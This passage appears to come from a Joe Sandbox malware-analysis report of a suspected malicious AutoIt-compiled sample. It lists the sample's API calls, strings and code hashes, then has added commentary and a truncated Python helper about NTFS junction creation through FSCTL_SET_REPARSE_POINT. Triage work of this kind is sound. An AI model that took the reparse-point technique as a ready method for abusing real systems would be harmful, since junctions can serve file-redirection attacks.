                                • GetStockObject.GDI32(00000011), ref: 00C7A947
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7A952
                                  • Part of subcall function 00C7B736: GetCursorPos.USER32(000000FF), ref: 00C7B749
                                  • Part of subcall function 00C7B736: ScreenToClient.USER32(00000000,000000FF), ref: 00C7B766
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000001), ref: 00C7B78B
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000002), ref: 00C7B799
                                • SetTimer.USER32(00000000,00000000,00000028,00C7ACEE), ref: 00C7A979
                                Strings
                                Similarity
                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                • String ID: AutoIt v3 GUI
                                • API String ID: 1458621304-248962490
                                • Opcode ID: 647be723efb2ac6c4bc7b21d6c3446be1fe5c4e12f1aaf3cb0502dc807738e0e
                                • Instruction ID: 76fd8f741ba0dbdee825b75858c84c90b83481ecb8185799a30857d108a88868
                                • Opcode Fuzzy Hash: 647be723efb2ac6c4bc7b21d6c3446be1fe5c4e12f1aaf3cb0502dc807738e0e
                                • Instruction Fuzzy Hash: A7B16C75A0020AAFDB14DFA8DC85BAD7BB4FB58314F108229FA1AEB2D0D730D941DB51
                                APIs
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC3626
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CFDBF0,00000000,?,00000000,?,?), ref: 00CC3694
                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CC36DC
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CC3765
                                • RegCloseKey.ADVAPI32(?), ref: 00CC3A85
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC3A92
                                Strings
                                Similarity
                                • API ID: Close$ConnectCreateRegistryValue
                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                • API String ID: 536824911-966354055
                                • Opcode ID: 861e8d7e8bfedcd9a10183dc19aec9a5d540a5067d8bb175f57c86d87fa19027
                                • Instruction ID: 42dd6d72aa5e807f4e55e23b118ab515d92511f907323da9a96e354c45fd767c
                                • Opcode Fuzzy Hash: 861e8d7e8bfedcd9a10183dc19aec9a5d540a5067d8bb175f57c86d87fa19027
                                • Instruction Fuzzy Hash: 3E02AE752006419FCB14EF28D895E2AB7E4FF89324F04855DF99AAB3A1DB30ED05DB81
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00CC6A52
                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CC6B12
                                Strings
                                Similarity
                                • API ID: BuffCharMessageSendUpper
                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                • API String ID: 3974292440-719923060
                                • Opcode ID: bbd99168f0d438385bbd09ce0d1af03a7def1f00eaba2277f1508031934ceb52
                                • Instruction ID: 1e7b7fe456c15681854cfe8eac74940edfc4bb3e8071e7fea80f7312626a635b
                                • Opcode Fuzzy Hash: bbd99168f0d438385bbd09ce0d1af03a7def1f00eaba2277f1508031934ceb52
                                • Instruction Fuzzy Hash: F0A170702142019FCB14EF24CA91F6AB3A5EF45314F14896DF8A69B3D2DB30ED06EB52
                                APIs
                                • GetClassNameW.USER32(?,?,00000100), ref: 00C9DD87
                                • __swprintf.LIBCMT ref: 00C9DE28
                                • _wcscmp.LIBCMT ref: 00C9DE3B
                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C9DE90
                                • _wcscmp.LIBCMT ref: 00C9DECC
                                • GetClassNameW.USER32(?,?,00000400), ref: 00C9DF03
                                • GetDlgCtrlID.USER32(?), ref: 00C9DF55
                                • GetWindowRect.USER32(?,?), ref: 00C9DF8B
                                • GetParent.USER32(?), ref: 00C9DFA9
                                • ScreenToClient.USER32(00000000), ref: 00C9DFB0
                                • GetClassNameW.USER32(?,?,00000100), ref: 00C9E02A
                                • _wcscmp.LIBCMT ref: 00C9E03E
                                • GetWindowTextW.USER32(?,?,00000400), ref: 00C9E064
                                • _wcscmp.LIBCMT ref: 00C9E078
                                Strings
                                Similarity
                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                • String ID: %s%u
                                • API String ID: 3119225716-679674701
                                • Opcode ID: d2195ac3c27ae0d07540681a5873151670f92a603bdc36c6ce16639ffdf327ef
                                • Instruction ID: fa60b9ec2141ea3e2a2fd6628359ee5cc140aaf828e01f6278739576dc01034c
                                • Opcode Fuzzy Hash: d2195ac3c27ae0d07540681a5873151670f92a603bdc36c6ce16639ffdf327ef
                                • Instruction Fuzzy Hash: D3A1D271204306EFDF14DF64C888BAAB7A8FF54354F008529F9AAD6190DB30EA55DBA1
                                APIs
                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00C9E6E1
                                • _wcscmp.LIBCMT ref: 00C9E6F2
                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C9E71A
                                • CharUpperBuffW.USER32(?,00000000), ref: 00C9E737
                                • _wcscmp.LIBCMT ref: 00C9E755
                                • _wcsstr.LIBCMT ref: 00C9E766
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9E79E
                                • _wcscmp.LIBCMT ref: 00C9E7AE
                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C9E7D5
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9E81E
                                • _wcscmp.LIBCMT ref: 00C9E82E
                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00C9E856
                                • GetWindowRect.USER32(00000004,?), ref: 00C9E8BF
                                Strings
                                Similarity
                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                • String ID: @$ThumbnailClass
                                • API String ID: 1788623398-1539354611
                                • Opcode ID: 804a1990ebd65e38d68dcd936d78248e5d8a78d9781541a59c88c0c008d12ffd
                                • Instruction ID: f5ec1259eacd89264f8c316e1643e47a965ad47817db51730b158fbf82d88880
                                • Opcode Fuzzy Hash: 804a1990ebd65e38d68dcd936d78248e5d8a78d9781541a59c88c0c008d12ffd
                                • Instruction Fuzzy Hash: 92819F310083459BDF15DF54C889FAA7BE8FF64714F04846AFDAA9A092DB30DE45CBA1
                                APIs
                                Strings
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                • API String ID: 1038674560-1810252412
                                • Opcode ID: 8335518c926e1d1e2966f5af90fefed96e58f3f18acdb0b8a570463d7401b411
                                • Instruction ID: b00260fe9fbe3d7127c9cdfdb5f1b8477ade9f02210a6c20ed3bf6fc497631a3
                                • Opcode Fuzzy Hash: 8335518c926e1d1e2966f5af90fefed96e58f3f18acdb0b8a570463d7401b411
                                • Instruction Fuzzy Hash: 7331AE31A44209BADB24FB60ED87EFE73A55F20708F200524F651B10D6FF526F68E6A5
                                APIs
                                • LoadIconW.USER32(00000063), ref: 00C9F8AB
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9F8BD
                                • SetWindowTextW.USER32(?,?), ref: 00C9F8D4
                                • GetDlgItem.USER32(?,000003EA), ref: 00C9F8E9
                                • SetWindowTextW.USER32(00000000,?), ref: 00C9F8EF
                                • GetDlgItem.USER32(?,000003E9), ref: 00C9F8FF
                                • SetWindowTextW.USER32(00000000,?), ref: 00C9F905
                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C9F926
                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C9F940
                                • GetWindowRect.USER32(?,?), ref: 00C9F949
                                • SetWindowTextW.USER32(?,?), ref: 00C9F9B4
                                • GetDesktopWindow.USER32 ref: 00C9F9BA
                                • GetWindowRect.USER32(00000000), ref: 00C9F9C1
                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C9FA0D
                                • GetClientRect.USER32(?,?), ref: 00C9FA1A
                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C9FA3F
                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9FA6A
                                Similarity
                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                • String ID:
                                • API String ID: 3869813825-0
                                • Opcode ID: 2963ae3184ce427364c03cb78748d70c270a378ff2d6822d22ba16ad159f163c
                                • Instruction ID: 801584cf511dff5a4f7fbf3b0d9b1a301dc3865f782c4e72e27e06c6e664a2e2
                                • Opcode Fuzzy Hash: 2963ae3184ce427364c03cb78748d70c270a378ff2d6822d22ba16ad159f163c
                                • Instruction Fuzzy Hash: 8B513971900709AFDB209FA8CD89B6EBBB9FF04704F00492DE696E65A0C774A945DB50
                                APIs
                                • _memset.LIBCMT ref: 00CCCD0B
                                • DestroyWindow.USER32(?,?), ref: 00CCCD83
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CCCE04
                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CCCE26
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCCE35
                                • DestroyWindow.USER32(?), ref: 00CCCE52
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C60000,00000000), ref: 00CCCE85
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCCEA4
                                • GetDesktopWindow.USER32 ref: 00CCCEB9
                                • GetWindowRect.USER32(00000000), ref: 00CCCEC0
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CCCED2
                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CCCEEA
                                  • Part of subcall function 00C7B155: GetWindowLongW.USER32(?,000000EB), ref: 00C7B166
                                Strings
                                Similarity
                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                • String ID: 0$tooltips_class32
                                • API String ID: 1297703922-3619404913
                                • Opcode ID: 1b1cc62a0b4acbd8ec9e5157fe4a6a4f43b34a3201e857a6f33d92cd60a18c97
                                • Instruction ID: 86e70c05f82291efa8829d43e2d972d4fed5457f969799100cc41099b21e1bb0
                                • Opcode Fuzzy Hash: 1b1cc62a0b4acbd8ec9e5157fe4a6a4f43b34a3201e857a6f33d92cd60a18c97
                                • Instruction Fuzzy Hash: CC71AE75140349AFD724CF28CCC5FAA7BE5EB89704F44491CF99A9B2A1D770E902DB21
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • DragQueryPoint.SHELL32(?,?), ref: 00CCF14B
                                  • Part of subcall function 00CCD5EE: ClientToScreen.USER32(?,?), ref: 00CCD617
                                  • Part of subcall function 00CCD5EE: GetWindowRect.USER32(?,?), ref: 00CCD68D
                                  • Part of subcall function 00CCD5EE: PtInRect.USER32(?,?,00CCEB2C), ref: 00CCD69D
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCF1B4
                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CCF1BF
                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CCF1E2
                                • _wcscat.LIBCMT ref: 00CCF212
                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CCF229
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCF242
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCF259
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00CCF27B
                                • DragFinish.SHELL32(?), ref: 00CCF282
                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CCF36D
                                Strings
                                Similarity
                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                • API String ID: 169749273-3440237614
                                • Opcode ID: 1c7831189314887f69ea38dac57302a71fb01d0c72fcd27cade0686b4d97cb61
                                • Instruction ID: cd2c085e690afa1f0245db98d9fa999385529cf0dd6cdeba0d21f7f2288c1859
                                • Opcode Fuzzy Hash: 1c7831189314887f69ea38dac57302a71fb01d0c72fcd27cade0686b4d97cb61
                                • Instruction Fuzzy Hash: C9614871108304AFC710EF60DC85E9FBBF9BF99710F004A2DF596961A1DB309A4ADB62
                                APIs
                                • VariantInit.OLEAUT32(00000000), ref: 00CAB46D
                                • VariantCopy.OLEAUT32(?,?), ref: 00CAB476
                                • VariantClear.OLEAUT32(?), ref: 00CAB482
                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CAB561
                                • __swprintf.LIBCMT ref: 00CAB591
                                • VarR8FromDec.OLEAUT32(?,?), ref: 00CAB5BD
                                • VariantInit.OLEAUT32(?), ref: 00CAB63F
                                • SysFreeString.OLEAUT32(00000016), ref: 00CAB6D1
                                • VariantClear.OLEAUT32(?), ref: 00CAB727
                                • VariantClear.OLEAUT32(?), ref: 00CAB736
                                • VariantInit.OLEAUT32(00000000), ref: 00CAB772
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                • API String ID: 3730832054-3931177956
                                • Opcode ID: 980d23f8e0fb940b09c9b5eff40a466bea71a5c130c278d244dc919ec4a34b50
                                • Instruction ID: 8bd686bf4f470a89f291269983bea2f86db484caf4d324b0d98393a46532c1cf
                                • Opcode Fuzzy Hash: 980d23f8e0fb940b09c9b5eff40a466bea71a5c130c278d244dc919ec4a34b50
                                • Instruction Fuzzy Hash: 9EC1E331A00616EBCB20DFA6D484B6DB7B4FF0A318F248465F4159B293DB74ED44EBA1
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00CC6FF9
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC7044
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharMessageSendUpper
                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                • API String ID: 3974292440-4258414348
                                • Opcode ID: f0365f02742b8116450f4d8b082eedb928340dffee577459767bcc65bee45d6c
                                • Instruction ID: ba885123fdd62152618df58381c53bb62af8ac97e22ab219809c9215fcdaf20a
                                • Opcode Fuzzy Hash: f0365f02742b8116450f4d8b082eedb928340dffee577459767bcc65bee45d6c
                                • Instruction Fuzzy Hash: C9917F742042019FCB14EF15C891F69B7A2EF98350F04896DF8966B3A2CF31ED4ADB42
                                APIs
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CCE3BB
                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CCBCBF), ref: 00CCE417
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCE457
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCE49C
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CCE4D3
                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00CCBCBF), ref: 00CCE4DF
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CCE4EF
                                • DestroyIcon.USER32(?,?,?,?,?,00CCBCBF), ref: 00CCE4FE
                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CCE51B
                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CCE527
                                  • Part of subcall function 00C81BC7: __wcsicmp_l.LIBCMT ref: 00C81C50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                • String ID: .dll$.exe$.icl
                                • API String ID: 1212759294-1154884017
                                • Opcode ID: dbf7f2c9f1fe2ccc6e51dcc086ecaf1544269c7f6e49633cc0d60652c9faa53c
                                • Instruction ID: a6a96acc7948bcc5da904b1ad9e53be2798ed12934befc254d4c5a4524f58b40
                                • Opcode Fuzzy Hash: dbf7f2c9f1fe2ccc6e51dcc086ecaf1544269c7f6e49633cc0d60652c9faa53c
                                • Instruction Fuzzy Hash: 5561A0B1540255BFEB14DFA4CC86FBE77ACAB09714F104219F925EB0D1DB74AA80D7A0
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 00CB0EFF
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB0F0F
                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB0F1B
                                • __wsplitpath.LIBCMT ref: 00CB0F79
                                • _wcscat.LIBCMT ref: 00CB0F91
                                • _wcscat.LIBCMT ref: 00CB0FA3
                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CB0FB8
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0FCC
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0FFE
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB101F
                                • _wcscpy.LIBCMT ref: 00CB102B
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CB106A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                • String ID: *.*
                                • API String ID: 3566783562-438819550
                                • Opcode ID: 85ab85fc637627bbc30506d77405201f3b25ae30d10a34f2cb2b2c8a0fa740f6
                                • Instruction ID: 39e062b0ef63789630f344cbb5cf5cfff62a528155b306d2314703915e9c8966
                                • Opcode Fuzzy Hash: 85ab85fc637627bbc30506d77405201f3b25ae30d10a34f2cb2b2c8a0fa740f6
                                • Instruction Fuzzy Hash: 9B617DB25043459FC720EF60C894ADFB3E8FF89314F04891AF99997251EB35EA45CB92
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • CharLowerBuffW.USER32(?,?), ref: 00CADB26
                                • GetDriveTypeW.KERNEL32 ref: 00CADB73
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CADBBB
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CADBF2
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CADC20
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                • API String ID: 2698844021-4113822522
                                • Opcode ID: 2d81040e540b52ea8c62407f0922a91d5b743d1b2fe0f4b0ec0e743cb4529d98
                                • Instruction ID: c60e53afcdc6bf326eba0fd9b476af122dd71b9adc28f4786e772ec62d48084b
                                • Opcode Fuzzy Hash: 2d81040e540b52ea8c62407f0922a91d5b743d1b2fe0f4b0ec0e743cb4529d98
                                • Instruction Fuzzy Hash: EC516C71108305AFC700EF20D98196AB7F4FF88718F50896CF89A972A1DB31EE09DB52
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00CD4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00CA3145
                                • LoadStringW.USER32(00000000,?,00CD4085,00000016), ref: 00CA314E
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00CD4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00CA3170
                                • LoadStringW.USER32(00000000,?,00CD4085,00000016), ref: 00CA3173
                                • __swprintf.LIBCMT ref: 00CA31B3
                                • __swprintf.LIBCMT ref: 00CA31C5
                                • _wprintf.LIBCMT ref: 00CA326C
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA3283
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                • API String ID: 984253442-2268648507
                                • Opcode ID: 25fc7ecc4ef7c62294f4fb84eee5c4463967190ed789589b2a0ba63660c9128a
                                • Instruction ID: 8eed791100c403dafc60fc4ce064030359937794a4bc4b89519ff87dcd838387
                                • Opcode Fuzzy Hash: 25fc7ecc4ef7c62294f4fb84eee5c4463967190ed789589b2a0ba63660c9128a
                                • Instruction Fuzzy Hash: 66414471900249BACB14FBD0DDD7EEEB7789F15704F100565F601B20A2DE616F45EB61
                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00CAD96C
                                • __swprintf.LIBCMT ref: 00CAD98E
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CAD9CB
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CAD9F0
                                • _memset.LIBCMT ref: 00CADA0F
                                • _wcsncpy.LIBCMT ref: 00CADA4B
                                • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00CADA80
                                • CloseHandle.KERNEL32(00000000), ref: 00CADA8B
                                • RemoveDirectoryW.KERNEL32(?), ref: 00CADA94
                                • CloseHandle.KERNEL32(00000000), ref: 00CADA9E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                • String ID: :$\$\??\%s
                                • API String ID: 2733774712-3457252023
                                • Opcode ID: 45695b7722e502eaec026d1b0088a94191904a4b4d1fe46202055a62b7779bc9
                                • Instruction ID: a3a5a49562ebfaede43a1c91a910bc5626ced8fad434780f401584ff4b24119f
                                • Opcode Fuzzy Hash: 45695b7722e502eaec026d1b0088a94191904a4b4d1fe46202055a62b7779bc9
                                • Instruction Fuzzy Hash: 0331C672600249AADB20DFA4DC89FDF77BCAF85714F0081A5F51AD6060EB70DF419BA1
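The CreateFileW / DeviceIoControl chain listed above is the pattern used to create an NTFS mount point (directory junction): a directory is created, opened with GENERIC_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (0x02200000), and FSCTL_SET_REPARSE_POINT (0x000900A4) is issued with IO_REPARSE_TAG_MOUNT_POINT (0xA0000003), while the "\??\%s" format string produces the NT-namespace substitute name a mount point requires; on failure the directory is removed again. The Python helper below is an added example, not part of the Joe Sandbox report or of the analysed sample. It decodes the raw argument constants shown in the API list into their Windows SDK names so the sequence can be read at a glance during triage. The numeric values are taken from the report's argument lists; the function names, the summary format and the (deliberately small) naming tables covering only reparse-point-related codes are assumptions of this example.

```python
"""Decode the CreateFileW / DeviceIoControl argument constants of a
reparse-point creation sequence into their winioctl.h / winnt.h names.
Numeric inputs are the values listed in the sandbox report; the bit
layouts and symbolic names are standard Windows SDK definitions."""

# CTL_CODE(DeviceType, Function, Method, Access) layout:
#   bits 31..16 device type, 15..14 required access,
#   bits 13..2 function number, bits 1..0 transfer method.
DEVICE_TYPES = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESSES = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
            "FILE_READ_ACCESS|FILE_WRITE_ACCESS")
# Only the file-system FSCTLs that manipulate reparse points are named (assumed subset).
FSCTL_NAMES = {
    (0x9, 41): "FSCTL_SET_REPARSE_POINT",
    (0x9, 42): "FSCTL_GET_REPARSE_POINT",
    (0x9, 43): "FSCTL_DELETE_REPARSE_POINT",
}
# Reparse tag layout: bit 31 Microsoft-defined, bit 29 name surrogate
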